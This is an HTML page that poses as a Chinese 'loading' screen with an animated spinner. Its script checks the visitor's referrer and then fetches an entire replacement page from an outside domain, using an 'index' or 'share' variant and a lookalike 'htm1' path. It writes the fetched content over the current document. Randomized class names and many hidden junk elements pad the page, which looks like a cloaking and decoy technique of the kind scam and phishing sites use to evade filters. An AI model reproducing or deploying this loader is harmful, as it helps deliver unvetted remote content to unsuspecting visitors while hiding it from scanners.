<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sjI8DAfu20q {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sjI8DAfu20q .WQhOgPXi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sjI8DAfu20q .content {
            line-height: 50px;
            text-align: center
        }

        .sjI8DAfu20q .img {
            width: 100%
        }

        .sjI8DAfu20q .hvphVu {
            text-align: center
        }

        .sjI8DAfu20q .hvphVu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sjI8DAfu20q .hvphVu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sjI8DAfu20q .hvphVu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sjI8DAfu20q .hvphVu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sjI8DAfu20q .hvphVu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sjI8DAfu20q .hvphVu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sjI8DAfu20q .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rxaz1iFG8Nba(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var djKZDX = rxaz1iFG8Nba('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ djKZDX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ djKZDX +".html?a=share";
		}
		
        ot9rmL4=url+"#"+new Date().getTime();
        ot9rmL4 && function() {
            $.get(ot9rmL4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>gcwgNBJQSU8ZAtLsApyIhO5tRZwMl</span>
<div style='display:none'>G5q8yUDdY2pAulC5Nfn5Z7n7</div>
<div style='display:none'>G5q8yUDdY2pAulC5Nfn5Z7n7</div>
<p  style='display:none'>FL5HwjcTJFUBOUxAWTNeHxP6w3arAqqeUoZLXqTA8pfxsjE80nMBjQr</p><div class="sjI8DAfu20q">
    <div class="WQhOgPXi">
        <div class="hvphVu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >X375BOrka1kMfEIgwYzqiy4XSTzichcFVP8x8DHwxhjW8xY0ORIgIGqZHrr0xh2qqkRqc4h7gdTkbIXUrpB</ul>
<p  style='display:none'>XBCgpOduKlnY2GKJtHOb3yHUCs0WHdOGwTyLeCnnxDSZPiT5p2ktog8J2mN3</p>
<span style='display:none'>KJLgF1wT5KNs9rAcMo</span>
<b style='display:none' >bf7I10yleU5DZy</b>
<a  href='#' style='display:none'>ekWtxjskxWynMXboUxQWUNnBElXKNUKjDlXXB216X52ZZeU2HOkJze</a>
<li style='display:none' >CQl5ucfExCsgRNU1n8Wr66tLCRAIMAlribgiTN8wjDWj6YeHlZPlBxQF8vwNjSDcyYKGtfo44T7YBdvGsSU5ZegZJ06hWcA8dK7d5</li>
<img  src='' style='display:none'>
<h1 style='display:none' >Esy8v58CUtmw8dVRNWpUbFeo2b326nn3ilPVAsz2vloh9407eCRslKvXm7pRX9eLPEUxRtDjfD9Rgxvlr9gz5J</h1></body>
</html>